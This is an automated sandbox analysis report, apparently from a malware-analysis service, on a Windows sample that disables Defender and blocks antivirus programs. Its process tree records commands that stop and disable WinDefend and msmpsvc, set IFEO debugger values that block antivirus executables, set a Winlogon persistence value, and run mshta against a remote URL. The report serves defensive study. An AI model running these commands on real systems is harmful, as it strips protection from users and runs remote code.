Analysis
-
max time kernel
150s -
max time network
96s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
14-09-2024 01:50
Static task
static1
Behavioral task
behavioral1
Sample
df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe
Resource
win10v2004-20240802-en
General
-
Target
df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe
-
Size
2.5MB
-
MD5
df466958538c6b28eb2604b27dfb108c
-
SHA1
8f5f789f48005010debe839a3b94a17774fafd7e
-
SHA256
959fc5578657c7e2196670dc09c05689986e699418e30f720884a7ac08837a42
-
SHA512
e18bc88d07e078afb1f9d7376c6871298b553014460e2fae47852a69f3a85a3f3d326211dbc166c7fa48d880db8cdf3889f65c603c65ae4aa8cc994635c4aec1
-
SSDEEP
49152:wBCD2WkxAPaUlSTX/FplIQjHa4P+36bJdgIh3pShBz+xkLYAXp+a:wBpWXyUqIN4P+qbJKC38+xkLYAXp+a
Malware Config
Extracted
http://soft-store-inc.com/soft-usage/favicon.ico?0=1200&1=HVDPCYGS&2=i-s&3=172&4=9200&5=6&6=2&7=919041&8=1033
Signatures
-
Modifies WinLogon for persistence 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\ymndic.exe" ymndic.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 16 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe ymndic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" ymndic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" ymndic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" ymndic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" ymndic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe\Debugger = "svchost.exe" ymndic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe ymndic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe ymndic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe ymndic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" ymndic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe ymndic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe ymndic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe ymndic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" ymndic.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe\Debugger = "svchost.exe" ymndic.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe ymndic.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe -
Executes dropped EXE 1 IoCs
pid Process 3252 ymndic.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Launches sc.exe 6 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1340 sc.exe 1912 sc.exe 552 sc.exe 4716 sc.exe 4060 sc.exe 4376 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ymndic.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 3252 ymndic.exe Token: SeShutdownPrivilege 3252 ymndic.exe Token: SeDebugPrivilege 3252 ymndic.exe Token: SeShutdownPrivilege 3252 ymndic.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe 3252 ymndic.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3252 ymndic.exe 3252 ymndic.exe -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 2444 wrote to memory of 1340 2444 df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe 86 PID 2444 wrote to memory of 1340 2444 df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe 86 PID 2444 wrote to memory of 1340 2444 df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe 86 PID 2444 wrote to memory of 1912 2444 df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe 87 PID 2444 wrote to memory of 1912 2444 df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe 87 PID 2444 wrote to memory of 1912 2444 df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe 87 PID 2444 wrote to memory of 4084 2444 df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe 88 PID 2444 wrote to memory of 4084 2444 df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe 88 PID 2444 wrote to memory of 4084 2444 df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe 88 PID 2444 wrote to memory of 552 2444 df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe 89 PID 2444 wrote to memory of 552 2444 df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe 89 PID 2444 wrote to memory of 552 2444 df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe 89 PID 2444 wrote to memory of 3252 2444 df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe 94 PID 2444 wrote to memory of 3252 2444 df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe 94 PID 2444 wrote to memory of 3252 2444 df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe 94 PID 4084 wrote to memory of 1620 4084 net.exe 95 PID 4084 wrote to memory of 1620 4084 net.exe 95 PID 4084 wrote to memory of 1620 4084 net.exe 95 PID 2444 wrote to memory of 968 2444 df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe 96 PID 2444 wrote to memory of 968 2444 df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe 96 PID 2444 wrote to memory of 968 2444 df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe 96 PID 3252 wrote to memory of 4716 3252 ymndic.exe 99 PID 3252 wrote to memory of 4716 3252 ymndic.exe 99 PID 3252 wrote to memory of 4716 3252 ymndic.exe 99 PID 3252 wrote to memory of 4060 3252 ymndic.exe 100 PID 3252 wrote to memory of 4060 3252 ymndic.exe 100 PID 3252 wrote to memory of 4060 3252 ymndic.exe 100 PID 3252 wrote to memory of 2400 3252 ymndic.exe 101 PID 3252 wrote to memory of 2400 3252 ymndic.exe 101 PID 3252 wrote to memory of 2400 3252 ymndic.exe 101 PID 3252 wrote to memory of 4376 3252 ymndic.exe 102 PID 3252 wrote to memory of 4376 3252 ymndic.exe 102 PID 3252 wrote to memory of 4376 3252 ymndic.exe 102 PID 2400 wrote to memory of 1200 2400 net.exe 107 PID 2400 wrote to memory of 1200 2400 net.exe 107 PID 2400 wrote to memory of 1200 2400 net.exe 107 PID 3252 wrote to memory of 1480 3252 ymndic.exe 108 PID 3252 wrote to memory of 1480 3252 ymndic.exe 108 PID 3252 wrote to memory of 1480 3252 ymndic.exe 108
Processes
-
C:\Users\Admin\AppData\Local\Temp\df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\df466958538c6b28eb2604b27dfb108c_JaffaCakes118.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2444 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1340
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:1912
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4084 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc3⤵
- System Location Discovery: System Language Discovery
PID:1620
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled2⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:552
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\ymndic.exeC:\Users\Admin\AppData\Roaming\Microsoft\ymndic.exe2⤵
- Modifies WinLogon for persistence
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3252 -
C:\Windows\SysWOW64\sc.exesc stop WinDefend3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4716
-
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4060
-
-
C:\Windows\SysWOW64\net.exenet stop msmpsvc3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop msmpsvc4⤵
- System Location Discovery: System Language Discovery
PID:1200
-
-
-
C:\Windows\SysWOW64\sc.exesc config msmpsvc start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
PID:4376
-
-
C:\Windows\SysWOW64\mshta.exemshta.exe "http://soft-store-inc.com/soft-usage/favicon.ico?0=1200&1=HVDPCYGS&2=i-s&3=172&4=9200&5=6&6=2&7=919041&8=1033"3⤵
- System Location Discovery: System Language Discovery
PID:1480
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\DF4669~1.EXE" >> NUL2⤵
- System Location Discovery: System Language Discovery
PID:968
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Privilege Escalation
Boot or Logon Autostart Execution
1Winlogon Helper DLL
1Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Image File Execution Options Injection
1Defense Evasion
Impair Defenses
1Indicator Removal
1File Deletion
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.5MB
MD5df466958538c6b28eb2604b27dfb108c
SHA18f5f789f48005010debe839a3b94a17774fafd7e
SHA256959fc5578657c7e2196670dc09c05689986e699418e30f720884a7ac08837a42
SHA512e18bc88d07e078afb1f9d7376c6871298b553014460e2fae47852a69f3a85a3f3d326211dbc166c7fa48d880db8cdf3889f65c603c65ae4aa8cc994635c4aec1